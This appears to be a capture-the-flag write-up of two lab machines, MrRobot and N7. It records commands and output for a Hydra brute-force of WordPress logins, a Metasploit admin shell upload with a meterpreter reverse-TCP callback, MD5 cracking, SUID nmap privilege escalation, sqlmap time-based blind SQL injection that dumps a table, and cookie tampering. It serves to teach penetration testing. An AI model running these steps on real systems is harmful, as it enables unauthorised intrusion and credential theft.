CTFs

MrRobot

Level: Easy | OS: Linux

Date release: 28 Jun 2016

Author: Leon Johnson

Enumeration [1st Flag]

The assessment began with a network-wide Nmap scan to discover active hosts within the environment:

┌──(Kali@Kali)-[~/MrRobot]
└─$ sudo nmap -T4 192.168.68.0/24 -sV

Since the target is running in a virtualized environment, I identified 192.168.68.101 as the correct host by observing the MAC Address vendor prefix.
With the target confirmed, the scan further revealed the following active services:

Port 22 [SSH]: closed
Port 80 [HTTP]: Running Apache httpd web server.
Port 443 [HTTPS]: Running Apache httpd web server with SSL/TLS enabled.

Navigating to the Apache HTTP server through BurpSuite [to record all traffic] revealed an immersive, stylized web interface.
The site greeted me with a series of terminal-style animations simulating a system boot sequence.
Once complete, I was presented with a mock web shell that accepted a limited set of six specific commands, setting the thematic tone for the Mr. Robot challenge:

A manual check of robots.txt yielded two significant discoveries: a wordlist named fsocity.dic and the first objective, key-1-of-3.txt:

fsocity.dic
key-1-of-3.txt

First flag key-1-of-3.txt: 073403c8a58a1f80d943455fb30724b9

fsocity.dic wordlist:

I downloaded the wordlist locally for further analysis

┌──(Kali@Kali)-[~/MrRobot]
└─$ curl http://192.168.68.101/fsocity.dic >> fsocity.txt
  % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current
                                 Dload  Upload  Total   Spent   Left   Speed
100  6.90M 100  6.90M   0      0 83.54M      0                              0

After sorting the list and removing duplicates, I narrowed the wordlist down to 11,451 unique words and saved the content into a new file:

┌──(Kali@Kali)-[~/MrRobot]
└─$ sort fsocity.txt | uniq | wc -l
11451
sort fsocity.txt | uniq >> uniq.txt

With manual enumeration complete, I leveraged Nikto to scan for common web vulnerabilities and misconfigurations.
The scan identified a WordPress installation, providing a clear attack vector for the next phase:

┌──(Kali@Kali)-[~/MrRobot]
└─$ nikto -h 192.168.68.101:80
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.68.101
+ Target Hostname:    192.168.68.101
+ Target Port:        80
+ Start Time:         2026-01-29 06:11:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /mJa3BMQO.php_bak: Retrieved x-powered-by header: PHP/5.5.29.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html, index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /admin/: This might be interesting.
+ /readme: This might be interesting.
+ /image/: Drupal Link header found with value: < http://192.168.68.101/?p=23>; rel=shortlink. See: https://www.drupal.org/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ /wp-login/: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found.
+ /wordpress/wp-admin/wp-login.php: Wordpress login found.
+ /blog/wp-login.php: Wordpress login found.
+ /wp-login.php: Wordpress login found.
+ /wordpress/wp-login.php: Wordpress login found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2026-01-29 06:13:07 (GMT-5) (123 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Navigating to /wp-login.php , I began probing the authentication mechanism.
Initial testing with a generic username yielded the standard "invalid username" response.

However, attempting to authenticate as "elliot" [inspired by the machine's theme] produced a different error message,
confirming this as a valid username on the system:

With a valid username identified, I proceeded to brute-force the password using Hydra and the optimized wordlist from earlier:

┌──(Kali@Kali)-[~/MrRobot]
└─$ hydra -V -l elliot -P uniq.txt 192.168.68.101 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-29 07:27:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:1/p:11452), ~716 tries per task
[DATA] attacking http-post-form://192.168.68.101:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "000" - 1 of 11452 [child 0] (0/0)
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "000000" - 2 of 11452 [child 1] (0/0)
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "000080" - 3 of 11452 [child 2] (0/0)
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "001" - 4 of 11452 [child 3] (0/0)
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "002" - 5 of 11452 [child 4] (0/0)
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "003" - 6 of 11452 [child 5] (0/0)
...
...
...
[80][http-post-form] host: 192.168.68.101   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found

Upon successful authentication, I was redirected to the /wp-admin/ dashboard, confirming that the compromised account possessed administrative privileges:

Exploitation [2nd Flag]

I launched metasploit via msfconsole and searched by the keywords: wordpress admin shell upload:

┌──(Kali@Kali)-[~/MrRobot]
└─$ msfconsole
Metasploit tip: Organize your work by creating workspaces with workspace -a < name>

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             https://metasploit.com


       =[ metasploit v6.4.110-dev                               ]
+ -- --=[ 2,601 exploits - 1,322 auxiliary - 1,707 payloads     ]
+ -- --=[ 431 post - 49 encoders - 14 nops - 9 evasion          ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

msf > search wordpress admin shell upload

Matching Modules
================

   #   Name                                                    Disclosure Date  Rank       Check  Description
   -   ----                                                    ---------------  ----       -----  -----------
   0   exploit/multi/http/wp_acf_extended_rce                  2025-12-02       excellent  Yes    WordPress ACF Extended Unauthenticated RCE via prepare_form()
   1     \_ target: PHP In-Memory                              .                .          .      .
   2     \_ target: Unix/Linux Command Shell                   .                .          .      .
   3     \_ target: Windows Command Shell                      .                .          .      .
   4   exploit/multi/http/wp_ai_engine_mcp_rce                 2025-11-04       excellent  Yes    WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE
   5     \_ target: PHP In-Memory                              .                .          .      .
   6     \_ target: Unix/Linux Command Shell                   .                .          .      .
   7     \_ target: Windows Command Shell                      .                .          .      .
   8   exploit/unix/webapp/wp_admin_shell_upload               2015-02-21       excellent  Yes    WordPress Admin Shell Upload
   9   exploit/multi/http/wp_king_addons_privilege_escalation  2025-10-30       excellent  Yes    WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE
   10    \_ target: PHP In-Memory                              .                .          .      .
   11    \_ target: Unix/Linux Command Shell                   .                .          .      .
   12    \_ target: Windows Command Shell                      .                .          .      .
   13  exploit/multi/http/wp_automatic_sqli_to_rce             2024-03-13       excellent  Yes    WordPress wp-automatic Plugin SQLi Admin Creation
   14    \_ target: PHP In-Memory                              .                .          .      .
   15    \_ target: Unix/Linux Command Shell                   .                .          .      .
   16    \_ target: Windows Command Shell                      .                .          .      .

By the description we can see that option 8 is exactly what we're looking for: WordPress Admin Shell Upload

msf > use 8
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.68.107   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

Configure all of the relevant options and attenpt to run:

msf exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME elliot
USERNAME => elliot
msf exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD ER28-0652
PASSWORD => ER28-0652
msf exploit(unix/webapp/wp_admin_shell_upload) > set RHOST 192.168.68.101
RHOST => 192.168.68.101
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.68.107:4444
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.

The initial exploit attempt failed as Metasploit's WordPress detecation mechanism did not identify the target properly.
After reviewing the advanced options, i disabled the WordPress check and the payload successfully deployed:

msf exploit(unix/webapp/wp_admin_shell_upload) > set WPCHECK false
WPCHECK => false
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.68.107:4444
[*] Authenticating with WordPress using elliot:ER28-0652...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/jMutSdmAbI/XRbLCFOFnB.php...
[*] Sending stage (42137 bytes) to 192.168.68.101
[*] Meterpreter session 1 opened (192.168.68.107:4444 -> 192.168.68.101:49154) at 2026-01-29 06:15:42 -0500
[!] This exploit may require manual cleanup of 'XRbLCFOFnB.php' on the target
[!] This exploit may require manual cleanup of 'jMutSdmAbI.php' on the target
[!] This exploit may require manual cleanup of '../jMutSdmAbI' on the target

meterpreter > shell
Process 1843 created.
Channel 0 created.

I upgraded the shell to an interactive tty and a more stable bash session:

python3 -c 'import pty; pty.spawn("/bin/bash")'
< ps/wordpress/htdocs/wp-content/plugins/jMutSdmAbI$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
< ps/wordpress/htdocs/wp-content/plugins/jMutSdmAbI$ cd /
daemon@linux:/$

We can see that we’re logged in as the user daemon. After looking around a bit, we find /home/robot that seem to contain interesting stuff:

daemon@linux:/$ cd /home/robot
cd /home/robot
daemon@linux:/home/robot$ ls
ls
key-2-of-3.txt  password.raw-md5
daemon@linux:/home/robot$ cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Initial attempts to access key-2-of-3.txt resulted in permission erros, since the file owned by robot user.
However, the password.raw-md5 file contained an unsalted MD5 hash the could be cracked using John:

┌──(Kali@Kali)-[~/MrRobot]
└─$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefghijklmnopqrstuvwxyz (?)
1g 0:00:00:00 DONE (2026-01-29 06:17) 10.00g/s 407040p/s 407040c/s 407040C/s bonjour1..teletubbies
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

With the credentials recovered, i siwtched to the robot user:

daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$

This granted access to the second flag:

robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Privilege Escalation [3rd Flag]

While exploring the system, I searched for SUID binaries executables that run with the privileges of their owner rather than the user executing them:

robot@linux:~$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

Analysis revealed that nmap was owned by root, a significant security misconfiguration.
Starting nmap interactively revealed it's an old version 3.81 which is known to be vulnerable to privilege escalation:

robot@linux:~$ nmap --interactive
nmap --interactive
    
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h < enter> for help
nmap>

Inspection of the help menu reveals that nmap can execute shell commands.
When i run the whoami command it confirmed execution with root privileges:

nmap> h
h
Nmap Interactive Commands:
n < nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish.  Results are printed to the
screen (of course you can still use file output commands).
! < command>   -- runs shell command given in the foreground
x             -- Exit Nmap
f [--spoof < fakeargs>] [--nmap_path < path>] < nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen).  You should generally specify a
file for results (with -oX, -oG, or -oN).  If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings.  If you wish to execute a special
version of Nmap, specify --nmap_path.
n -h          -- Obtain help with Nmap syntax
h             -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24
nmap> !whoami
!whoami
root
waiting to reap child : No child processes

This meant i can leverage nmap to spawn a root shell and find the last flag:

nmap> !sh
!sh
# cd /root
cd /root
# ls
ls
firstboot_done  key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Web Machine: (N7)

Level: Medium | OS: Linux

Date release: 3 Nov 2021

Author: Duty Mastr

Enumeration [1st Flag]

The assessment began with a network-wide Nmap scan to discover active hosts within the environment:

┌──(Kali@Kali)-[~/N7]
└─$ sudo nmap -T4 192.168.68.0/24 -sV

Since the target is running in a virtualized environment, I identified 192.168.68.115 as the correct host by observing the MAC Address vendor prefix.
The scan also revealed an Apache httpd server running on port 80:

Browsing to the website revealed an empty blog landing page:

Initial manual inspection yielded no hidden functionality or sensitive information.
To identify unlinked assets, I performed a directory brute-force attack using ffuf with the DirBuster-2007_directory-list-lowercase-2.3-medium.txt wordlist, targeting .php, .txt, and .html extensions:

┌──(Kali@Kali)-[~/N7]
└─$ ffuf -u http://192.168.68.115:80/FUZZ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt -e .php,.txt,.html

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.68.115:80/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt
 :: Extensions       : .php .txt .html
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

profile.php             [Status: 200, Size: 1473, Words: 508, Lines: 44, Duration: 1ms]
index.html              [Status: 200, Size: 1620, Words: 536, Lines: 49, Duration: 85ms]
javascript              [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 1ms]
exploit.html            [Status: 200, Size: 279, Words: 37, Lines: 12, Duration: 1ms]
.html                   [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 1ms]
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]
                        [Status: 200, Size: 1620, Words: 536, Lines: 49, Duration: 5ms]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 6ms]
:: Progress: [830516/830516] :: Job [1/1] :: 7142 req/sec :: Duration: [0:01:36] :: Errors: 0 ::

The scan identified several active endpoints.
While profile.php and index.html appeared standard, the discovery of exploit.html stood out as a high-interest target for further investigation.
Browsing to the page revealed a file upload function:

Initial upload attempts failed with a "Failed to connect to localhost:80" error.
This indicated that while the front-end form existed, the back-end logic may have been broken or misconfigured.

Examination of the HTML source code via Browser Developer Tools revealed a critical misconfiguration in the file upload form.
The action attribute was hardcoded to point to localhost rather than the server's IP address, causing the request to fail:

To remediate this locally and test the endpoint, I manually modified the DOM to point the form's action to the target's actual IP [192.168.68.115]:

After resubmitting the form with the corrected destination, the server processed the request and returned the first flag: FLAG{N7

Custom wordlist & SQLi [2nd Flag]

Standard enumeration using broad wordlists from /usr/share/seclists failed to identify any new points of entry.
Suspecting that the hidden endpoints might be related to the internal infrastructure, I created a custom wordlist.
I selected 15 networking-specific keywords and used them to generate two-word combinations for a more specialized fuzzing attempt:

To generate a targeted wordlist, I utilized a nested Bash loop to create every possible two-word combination from my list of 15 networking terms.
The script was designed to join the terms using both hyphens - and underscores _ while excluding self-matching pairs.
This resulted in a specialized dictionary of 420 unique permutations [calculated as $n \times (n-1) \times 2$], tailored specifically to environment naming convention:

┌──(Kali@Kali)-[~/N7]
└─$ while read i; do while read j; do [ "$i" != "$j" ] && echo "${i}-${j}" && echo "${i}_${j}"; done < words.txt; done < words.txt > combined_wordlist.txt

while read i; do ... done < words.txt: This is the outer loop. It reads the file line by line, assigning each word to the variable $i.
while read j; do ... done < words.txt: This is the inner loop. For every single word in $i, it iterates through the entire list again, assigning the current word to $j.
[ "$i" != "$j" ]: This is a safety check. It ensures the script doesn't combine a word with itself [preventing combinations like 'enter-enter'].
echo "${i}-${j}" && echo "${i}_${j}": This is the payload. It prints the two words joined by a hyphen and an underscore, respectively.
> combined_wordlist.txt: This redirects the final output into a new file for use with your fuzzer.

The custom wordlist yielded a hit, uncovering the enter_network directory:

┌──(Kali@Kali)-[~/N7]
└─$ ffuf -u http://192.168.68.115:80/FUZZ -w /usr/share/seclists/Discovery/Web-Content/two-words.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.68.115:80/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/two-words.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

enter_network           [Status: 301, Size: 324, Words: 20, Lines: 10, Duration: 4583ms]
:: Progress: [420/420] :: Job [1/1] :: 43 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

Accessing the new endpoint revealed the existence of a login portal:

Inspection of the login POST request revealed three active parameters within the payload:

Armed with the request parameters, I fired up sqlmap to check for SQL injection.
I used the following command to automate the exploit:

┌──(Kali@Kali)-[~/N7]
└─$ sqlmap -u "http://192.168.68.115/enter_network/" --data="user=test&pass=pass&sub=SEND" -p user,pass --level 3 --batch --threads 5 --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.10#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:53:46 /2026-01-30/

[15:53:46] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('user=JGFyZ29uMmk...gwejJmcTlr;role=MjEyMzJmMjk...FmYzM%253D'). Do you want to use those [Y/n] Y
[15:53:46] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:53:46] [INFO] testing if the target URL content is stable
[15:53:47] [INFO] target URL content is stable
[15:53:47] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[15:53:47] [INFO] testing for SQL injection on POST parameter 'user'
...
...
...
[15:56:30] [INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
[15:56:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:56:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:56:35] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:56:39] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:56:43] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:56:47] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:56:51] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 879 HTTP(s) requests:
---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=test' AND (SELECT 6961 FROM (SELECT(SLEEP(5)))CFsa)-- CoiA&pass=pass&sub=SEND
---
[15:57:25] [INFO] the back-end DBMS is MySQL
[15:57:25] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:57:31] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:57:31] [INFO] fetching current database
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[15:57:31] [INFO] retrieved:
[15:57:42] [INFO] adjusting time delay to 1 second due to good response times
Machine
[15:58:11] [INFO] fetching tables for database: 'Machine'
[15:58:11] [INFO] fetching number of tables for database 'Machine'
[15:58:11] [INFO] retrieved: 1
[15:58:13] [INFO] retrieved: login
[15:58:40] [INFO] fetching columns for table 'login' in database 'Machine'
[15:58:40] [INFO] retrieved: 3
[15:58:45] [INFO] retrieved: username
[15:59:19] [INFO] retrieved: password
[16:00:00] [INFO] retrieved: role
[16:00:22] [INFO] fetching entries for table 'login' in database 'Machine'
[16:00:22] [INFO] fetching number of entries for table 'login' in database 'Machine'
[16:00:22] [INFO] retrieved: 1
[16:00:25] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
admin
[16:00:56] [INFO] retrieved: FLAG{N7:KSA_01}
[16:02:16] [INFO] retrieved: administrator
Database: Machine
Table: login
[1 entry]
+--------+-----------------+---------------+
| role   | password        | username      |
+--------+-----------------+---------------+
| admin  | FLAG{N7:KSA_01} | administrator |
+--------+-----------------+---------------+

[16:03:14] [INFO] table 'Machine.login' dumped to CSV file '/home/naruto/.local/share/sqlmap/output/192.168.68.115/dump/Machine/login.csv'
[16:03:14] [INFO] fetched data logged to text files under '/home/naruto/.local/share/sqlmap/output/192.168.68.115'

[*] ending @ 16:03:14 /2026-01-30/

The SQL injection successfully dumped the login table from the Machine database, revealing our second flag: FLAG{N7:KSA_01}.
Despite acquiring valid credentials, attempting to log in with the user didn't yield any additional access or sensitive information:

Privilege Escalation via Cookie [3rd Flag]

With the credentials leading to a dead end, I shifted my focus toward the /enter_network/ directory.
I decided to fuzz this endpoint for hidden files or subdirectories using ffuf, targeting common extensions like .php, .txt, and .html:

┌──(Kali@Kali)-[~/N7]
└─$ ffuf -u http://192.168.68.115:80/enter_network/FUZZ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt -e .php,.txt,.html

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.68.115:80/enter_network/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt
 :: Extensions       : .php .txt .html
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

admin.php               [Status: 200, Size: 126, Words: 15, Lines: 7, Duration: 3ms]
index.php               [Status: 200, Size: 324, Words: 42, Lines: 19, Duration: 283ms]
                        [Status: 200, Size: 324, Words: 42, Lines: 19, Duration: 1ms]
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]
.html                   [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 3ms]
:: Progress: [830516/830516] :: Job [1/1] :: 14285 req/sec :: Duration: [0:01:22] :: Errors: 0 ::

The ffuf scan successfully identified a new endpoint: /enter_network/admin.php.
Upon navigating to the page, I was greeted with an 'this interface is admin only' restriction:

Further investigation via Burp Suite highlighted the session cookies as a potential vulnerability.
Given the 'this interface is admin only' restriction encountered previously, the role cookie became the primary target for manipulation:

The structure hinted at URL encoding combined with Base64.
Decoding it using Burp’s Decoder tab and “smart decode” option revealed a string:

The decoded string matched the signature of an MD5 hash.
I submitted the hash to CrackStation for a lookup, which successfully returned the plaintext value: admin